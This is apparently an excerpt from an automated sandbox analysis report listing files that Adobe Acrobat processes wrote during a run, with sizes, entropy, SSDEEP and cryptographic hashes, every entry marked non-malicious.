Size (bytes): | 1310720 |
Entropy (8bit): | 0.7556019565862813 |
Encrypted: | false |
SSDEEP: | 1536:FSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:FazaSvGJzYj2UlmOlOL |
MD5: | 5EDFA224C62BA61FF60C603E0951B680 |
SHA1: | 24BBC4B44AAD969D5B1137BC7E4283EE3A4A07CA |
SHA-256: | 55834EA19F21C4C7DD5E10DE4B0D81CBB958FD9651C9EDF09CC1546F4107D51D |
SHA-512: | E3FC45C03CA9C8B3DAA2D1F48CD0F7AFC5DCEA8FB8E990463B87ACE300CA9F9A3676191684884B0E7F26E4617A5CCF7E60B6A6B8FF3EBD819C629670F5B6707E |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.07860163925734748 |
Encrypted: | false |
SSDEEP: | 3:T+ml/yYewWkCeeuNaAPaU1l5CtlolluxmO+l/SNxOf:1UzLrBuNDPaUBgmOH |
MD5: | 8FFBDD3C9DD131FBAA98B643D62928AE |
SHA1: | FA98A8DC57D28D63736639F56F9F5F9D1790CF8C |
SHA-256: | 4C2AD7338D011CF3D90055734757750EE2BFA3EE38C0039D93166825B6E0A8FB |
SHA-512: | 0621C0E8C93F39765305A65F175F8E73B93B0F95B5F01FAC3FEAF84C21F8EEA6D4F2C76B75808CA31A0184F860FCF6C3CE5DCC9D431443B3C142F2955B92728A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.202531237671291 |
Encrypted: | false |
SSDEEP: | 6:iO4Q+wQ+q2PN72nKuAl9OmbnIFUtSQoUxwgZmwsQoUxwQVkwON72nKuAl9OmbjLJ:7l3vVaHAahFUtPocZ/xocz5OaHAaSJ |
MD5: | 562904549F7D2401C116E88A113A2582 |
SHA1: | A35B4A4D195177C2FAB41C729AAEEC84A0EB3580 |
SHA-256: | 4E900D437207D73C4F7328AFB7A4166FE0BAE8AA3755C70CA82C39855BF4DA07 |
SHA-512: | 32E72E7CB3159113AF07BA93683823AEFB3A81F67DB7A3CCB8C6C1D2C0E00745F2A7A8DCE282E830ED3915F79094FAA8786CF6ABED2F041F216C8796539E7C89 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.202531237671291 |
Encrypted: | false |
SSDEEP: | 6:iO4Q+wQ+q2PN72nKuAl9OmbnIFUtSQoUxwgZmwsQoUxwQVkwON72nKuAl9OmbjLJ:7l3vVaHAahFUtPocZ/xocz5OaHAaSJ |
MD5: | 562904549F7D2401C116E88A113A2582 |
SHA1: | A35B4A4D195177C2FAB41C729AAEEC84A0EB3580 |
SHA-256: | 4E900D437207D73C4F7328AFB7A4166FE0BAE8AA3755C70CA82C39855BF4DA07 |
SHA-512: | 32E72E7CB3159113AF07BA93683823AEFB3A81F67DB7A3CCB8C6C1D2C0E00745F2A7A8DCE282E830ED3915F79094FAA8786CF6ABED2F041F216C8796539E7C89 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 339 |
Entropy (8bit): | 5.0981118117193684 |
Encrypted: | false |
SSDEEP: | 6:iO4QVOq2PN72nKuAl9Ombzo2jMGIFUtSQsUFHQJZmwsQstekwON72nKuAl9Ombzz:7lVOvVaHAa8uFUtPscwJ/xste5OaHAaU |
MD5: | DD20FC9B8D94B3A1232EF8939FC710D9 |
SHA1: | 3BE29F21B507874B405CF8F30751745B40C94DB6 |
SHA-256: | 2FDF51AEEA9966E14AE2EC89FA3260D46144675A833906CCD17D1ECE8BE2E475 |
SHA-512: | C2020191EADF115F59796798291B33148511B8DAE8F647D9596A1576C57946C216B157172223A11E7571383E1F4D14790345EFA229A87B2B06AE88FBB885F361 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 339 |
Entropy (8bit): | 5.0981118117193684 |
Encrypted: | false |
SSDEEP: | 6:iO4QVOq2PN72nKuAl9Ombzo2jMGIFUtSQsUFHQJZmwsQstekwON72nKuAl9Ombzz:7lVOvVaHAa8uFUtPscwJ/xste5OaHAaU |
MD5: | DD20FC9B8D94B3A1232EF8939FC710D9 |
SHA1: | 3BE29F21B507874B405CF8F30751745B40C94DB6 |
SHA-256: | 2FDF51AEEA9966E14AE2EC89FA3260D46144675A833906CCD17D1ECE8BE2E475 |
SHA-512: | C2020191EADF115F59796798291B33148511B8DAE8F647D9596A1576C57946C216B157172223A11E7571383E1F4D14790345EFA229A87B2B06AE88FBB885F361 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.967403857886107 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqD2sBdOg2Hxgcaq3QYiubcP7E4T3y:Y2sRdsudMHxL3QYhbA7nby |
MD5: | A1EEFB51F3087D7E6F2C98168F3A09A2 |
SHA1: | F38337FCE58B2AF74E3D877C84D75912D755F5BA |
SHA-256: | 627543FDAC15922DF458FC77BE248D2AD55BA406F28E531C6078FFCA6F10D971 |
SHA-512: | B304CE263F9D9802B17E11E348BC560A8F26C7E365CE0B639A46E207C9C4C30F78FA64E7F7FE58268A3E3565AC6FF2A252D80D4080D90231E080BE58EB25DD34 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\c9b2c3cf-05b3-4ed9-a3b3-167d835e7dd3.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.967403857886107 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqD2sBdOg2Hxgcaq3QYiubcP7E4T3y:Y2sRdsudMHxL3QYhbA7nby |
MD5: | A1EEFB51F3087D7E6F2C98168F3A09A2 |
SHA1: | F38337FCE58B2AF74E3D877C84D75912D755F5BA |
SHA-256: | 627543FDAC15922DF458FC77BE248D2AD55BA406F28E531C6078FFCA6F10D971 |
SHA-512: | B304CE263F9D9802B17E11E348BC560A8F26C7E365CE0B639A46E207C9C4C30F78FA64E7F7FE58268A3E3565AC6FF2A252D80D4080D90231E080BE58EB25DD34 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 5449 |
Entropy (8bit): | 5.252284234051055 |
Encrypted: | false |
SSDEEP: | 96:av+Nkkl+2GAouz3z3xfNLUS3vHp5OuDzUrMzh28qXAXFP74LRXOtW7ANwE7Znn0M:av+Nkkl+2G1uz3zhfZUyPp5OuDzUwzh7 |
MD5: | C4A599A3891C1B30350AE9F2ECC24AF4 |
SHA1: | B0402FDE03A7FD4724C223FA82B4B846FE12D564 |
SHA-256: | 5F9F2767D5395C6CA23B3F14ACECF4D697F8B5DC246ACDB63B2E6E793AE566D0 |
SHA-512: | 2838A9D5E198ED873C09001EA67E5096CF61C4C189EA419BAE687DEF6C618A7476A196115A08FF8341E34A0A2BBE01441F017B95EBB86462AA2983A6AFF4F3DE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 327 |
Entropy (8bit): | 5.125749831839773 |
Encrypted: | false |
SSDEEP: | 6:iO4QEk34q2PN72nKuAl9OmbzNMxIFUtSQE/ZmwsQEKkwON72nKuAl9OmbzNMFLJ:7lB34vVaHAa8jFUtPs/xf5OaHAa84J |
MD5: | 1A9F68379976823023B975FB0A9FD872 |
SHA1: | EBA4667B0ED7F1F60668692729E88B145DB3EB1B |
SHA-256: | D1D008595B24117E870B2B9A601A2675248EB37F94A60D4D5B3CDBD7CC881127 |
SHA-512: | D8FC5A6DA28B768E07D30E5112C42DF69ECE3AEB5C4B06E2CC33E5318A98A8E389B4215BBDAF4614ED9568B6F3E09FABC6C35BB43FA4A1A150010073DF2AFD95 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 327 |
Entropy (8bit): | 5.125749831839773 |
Encrypted: | false |
SSDEEP: | 6:iO4QEk34q2PN72nKuAl9OmbzNMxIFUtSQE/ZmwsQEKkwON72nKuAl9OmbzNMFLJ:7lB34vVaHAa8jFUtPs/xf5OaHAa84J |
MD5: | 1A9F68379976823023B975FB0A9FD872 |
SHA1: | EBA4667B0ED7F1F60668692729E88B145DB3EB1B |
SHA-256: | D1D008595B24117E870B2B9A601A2675248EB37F94A60D4D5B3CDBD7CC881127 |
SHA-512: | D8FC5A6DA28B768E07D30E5112C42DF69ECE3AEB5C4B06E2CC33E5318A98A8E389B4215BBDAF4614ED9568B6F3E09FABC6C35BB43FA4A1A150010073DF2AFD95 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.444675937551481 |
Encrypted: | false |
SSDEEP: | 384:Seuci5tpiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:iKs3OazzU89UTTgUL |
MD5: | E4A2AEE12CB718D771BB0CFABDE3E7CD |
SHA1: | CBDE87B8E7F2A1924EE0032ADCF12BABE1F072B4 |
SHA-256: | 6EBB8427B2472B902D46F3571E2106615FB4C9C3666548E57492E6B318F23DFE |
SHA-512: | CE551D249E589A9A4F0C5B994E5EFAE0C3065430E7A479D7EDC32890B4B3527DBC229490A02E2CE98E6E3231244A0B815558ED2BEE2F5F11D4FE12A9472AA5B8 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.2135688386736336 |
Encrypted: | false |
SSDEEP: | 24:7+t2JnuwKbqLLzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9Mf:7MUnCbqPmFTIF3XmHjBoGGR+jMz+Lhi |
MD5: | FFBB1FE57C93232C1C928B804042BCCB |
SHA1: | EBEB27AF2742D9FC2E9E6DCC4B44668DAC4E5371 |
SHA-256: | 1AB032FEA7284B28F8BAE02CDF1090EE9634D15185284037E03476866233098E |
SHA-512: | 7CF51174ACF0DCD739BE743D437626B702B69A61CCF79727B07FF0242527A96AC9105CCC63AAA96F3913E5BB6B86761E2949118E070C75BEB31CFE34D52E47C7 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 71954 |
Entropy (8bit): | 7.996617769952133 |
Encrypted: | true |
SSDEEP: | 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ |
MD5: | 49AEBF8CBD62D92AC215B2923FB1B9F5 |
SHA1: | 1723BE06719828DDA65AD804298D0431F6AFF976 |
SHA-256: | B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F |
SHA-512: | BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.7529698674325394 |
Encrypted: | false |
SSDEEP: | 3:kkFklWl+GpttfllXlE/HT8k1etNNX8RolJuRdxLlGB9lQRYwpDdt:kKPreT88aNMa8RdWBwRd |
MD5: | 6F06BB7F9509211B2A0AADF58395F2A6 |
SHA1: | 35298089CF4BC760BBEE9C0E0E2B1A938BE402E8 |
SHA-256: | 5513270CB0D45B6C02E26C8B0E1CE52E6748FB10DE81FC985A8CF1D62B4C7CEF |
SHA-512: | AD3B8EC907145551723E398C3823DCB708E332D445EC73A4788FB7CF25CB4A9082E47B3B77F063AF1C18F8816656403045F4D447A037FA325789CCD82395239C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 328 |
Entropy (8bit): | 3.236892865807448 |
Encrypted: | false |
SSDEEP: | 6:kKyzL9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:giDImsLNkPlE99SNxAhUe/3 |
MD5: | EC49183F2B4A0E7E7FCCC22F94020F08 |
SHA1: | 13459CDD3AD0B03CD736A729A6BA13A931649BAE |
SHA-256: | 5CDFB667670C5E4BCCB33B20579481A30DD031EE57D88843FC4DFB2644042EBD |
SHA-512: | 2A37A924AFEF444A34F365E1DECEC3388A94DE65F71283CAF4CC9476B7D48D55F4AD7624D5327C9CB2D7E8D59E31CEB9B38A69B068BD92031CCB8258981DA10B |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.365944969944401 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX44CjIywGnZiQ0Y8fKoAvJM3g98kUwPeUkwRe9:YvXKXzBSc9BGMbLUkee9 |
MD5: | DD9C1D8BB85514266C14BEC031D1825D |
SHA1: | 8A5B744FE322BB657D9014BD6F608518A154B83F |
SHA-256: | 866BEC76F577EFA564B0983770B3579CEC6260C74EDF1542CBA1028C215CE1F9 |
SHA-512: | C1C329D1835D23C8FD1CDF2D9F212DD7BFCE2722E358EC7855826FF61452E4B7C88E5E29D676DC8F4B1D260A88268A28E6B56C026DA9115D8D2673B31BB08196 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.318998918036125 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX44CjIywGnZiQ0Y8fKoAvJfBoTfXpnrPeUkwRe9:YvXKXzBSc9BGWTfXcUkee9 |
MD5: | 359C58074EC628268FBC99FD3CA20A14 |
SHA1: | 2722203E79E973D9D783B75660863CEBE7962112 |
SHA-256: | 51C71439AE5856DEDA250802ACDAD9995489BE1E0CED6A38D7D8E576FE0FC3CC |
SHA-512: | B3CB56C94149BA2D806A9718BB345E40256126908EA1B3528AB8CA7ADD0C5F26B4BE638C23E650F032C1BB5995F3027BBFD2A9ABD41F9455577202CC0A789757 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.2975472345621295 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX44CjIywGnZiQ0Y8fKoAvJfBD2G6UpnrPeUkwRe9:YvXKXzBSc9BGR22cUkee9 |
MD5: | F57AF49DCE196E464F0B479F1F248F61 |
SHA1: | 4576AC745CC570E9BD459077CE2969D630FEA145 |
SHA-256: | D20E5818E40E08161095DCFFBF85724EC79751BE094CDC1F1AF47AD7C8D1E8F3 |
SHA-512: | 7F354E1F49A701613834FBD667B34241DD08E047EC0CBCD0C122AB51EFCABFF32B4C9F7D71F41B0D1A622D057BD6018E3AED1576D6E85912299F2408584D1A3B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.346058127489994 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX44CjIywGnZiQ0Y8fKoAvJfPmwrPeUkwRe9:YvXKXzBSc9BGH56Ukee9 |
MD5: | 7C5E382DA10EAAA6D3C0767A2B33A27C |
SHA1: | 637E1F8822982529EC5E301E144F9165037A96AF |
SHA-256: | F0080EB9CA3824B8DF77211E0CA6FFDE04F523C9326B7B677EEC8B18D071399E |
SHA-512: | 9D00DB6CE3CBC5BE1D740E31238BD3F7ED75702A87620FE28981926CE64C0473A7040D8D5D433880FABDBD6D0E2E640A54F95FB773EFCF8EEA9830DE5BD84ADF |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.6881263823432695 |
Encrypted: | false |
SSDEEP: | 24:Yv6XzBH9mpLgE9cQx8LennAvzBvkn0RCmK8czOCCSx:Yv2vmhgy6SAFv5Ah8cv/x |
MD5: | A8B4A02B1209613324ACC3B967393684 |
SHA1: | 85EBB578AF1A501437940FC728DB8F280B208161 |
SHA-256: | D45549218FB9D9EE5AFD0352015FD7C8E1A5A20AD31DEACDBAA8B18655C39555 |
SHA-512: | BA26EDB136338C85D41212009AB22FFC63D4F2C9868DD251D69118F510C53C0BBE1437E99C9BAD742EAE1062E9595AA438987DAB72A33DB8ACE676CC3D8E73DD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.295663584710991 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX44CjIywGnZiQ0Y8fKoAvJf8dPeUkwRe9:YvXKXzBSc9BGU8Ukee9 |
MD5: | 7BA87B273EFED48FB810F7F91F2315AE |
SHA1: | B83E24ACD28F2D65DEE47452301DDCF30EF74C02 |
SHA-256: | 22C400023A5401D1E85D82A7F879E04B60FB014AF9A66638CEF0EF9B4BBB5E6B |
SHA-512: | 1E2AC22D3CCDCC066B1B447A5D4895694953D4DC74104CC3182E06B060ED01D5BB326AD80E22A88AA8AF089A2929A3F5C9A34FB88394526CD84FC5585099BCBE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.298051391684243 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX44CjIywGnZiQ0Y8fKoAvJfQ1rPeUkwRe9:YvXKXzBSc9BGY16Ukee9 |
MD5: | 9AA92B88630A0D414E8AC7E1E5CB6360 |
SHA1: | F35F192770DFDAE76C16C27D19B1F4203C83B3EF |
SHA-256: | 98EA50B3108EA5E5404C2BEE4E010D02BC700322129A6F15F73E5B8EEB58649D |
SHA-512: | 6AFFD1092E336330CCC25BD267E589D28272B7C4CA3D32AC382D39954E2BFE9F85C5BE3C6828AD4A6716EA01F898CA8835B39335ED434F5FA6B220DF9973DEB3 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.306148123406104 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX44CjIywGnZiQ0Y8fKoAvJfFldPeUkwRe9:YvXKXzBSc9BGz8Ukee9 |
MD5: | 570779E02EF7B1ACA8015089E58C0414 |
SHA1: | C2FF659B2FDCE1D50D93D17F48BA8906EE4A682E |
SHA-256: | 41793D15C5B86508490BB4AD6AD7FA93BF2E63ADADC8CE6A2F4A083F7DEC051C |
SHA-512: | 8FE8E3051E5D21EEE50D1B477CC6B00A55A25BB77FFD6B61870A361E9D2597236C7F3A712139088C3B527D054C5880DF9B4941821CF499A7810DED52758D52CD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.32271619197182 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX44CjIywGnZiQ0Y8fKoAvJfzdPeUkwRe9:YvXKXzBSc9BGb8Ukee9 |
MD5: | F0776874E754E0C7AE7F1D19EEF8616B |
SHA1: | 61A7BA7CA4CE1777C694E9DC0A2CB2D6D33305D8 |
SHA-256: | A8F5ADFA550F839CCB195863BD93BD6121D90DA5FC52AC348B628773343BFF46 |
SHA-512: | 709F77A38FABA09057834213EDD5A4988E0070F0F1FCEB026FDC448CBC6661E8F4ADC4B88811E458901A5C974F3C946F04D183EC5F62C17001DE6A32935B1E2F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.3031357202225635 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX44CjIywGnZiQ0Y8fKoAvJfYdPeUkwRe9:YvXKXzBSc9BGg8Ukee9 |
MD5: | A89C6E47EACD0D4D8FC49A849473DCC1 |
SHA1: | AAC227F498256F9D2C0E638A2C86FF3028024D1C |
SHA-256: | 294CF55E6F889142A3C8BE1A2D6139FEFFF8B242F0FACD58D21CE63C257B735D |
SHA-512: | 4519CC776E99B3D3526FB9362A9AC90E4F6F1F380EA804915D6E60814318EFBF0758D5634415D05F860758D6705AACBD7A718061315929015A4BF24B16ADE33F |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
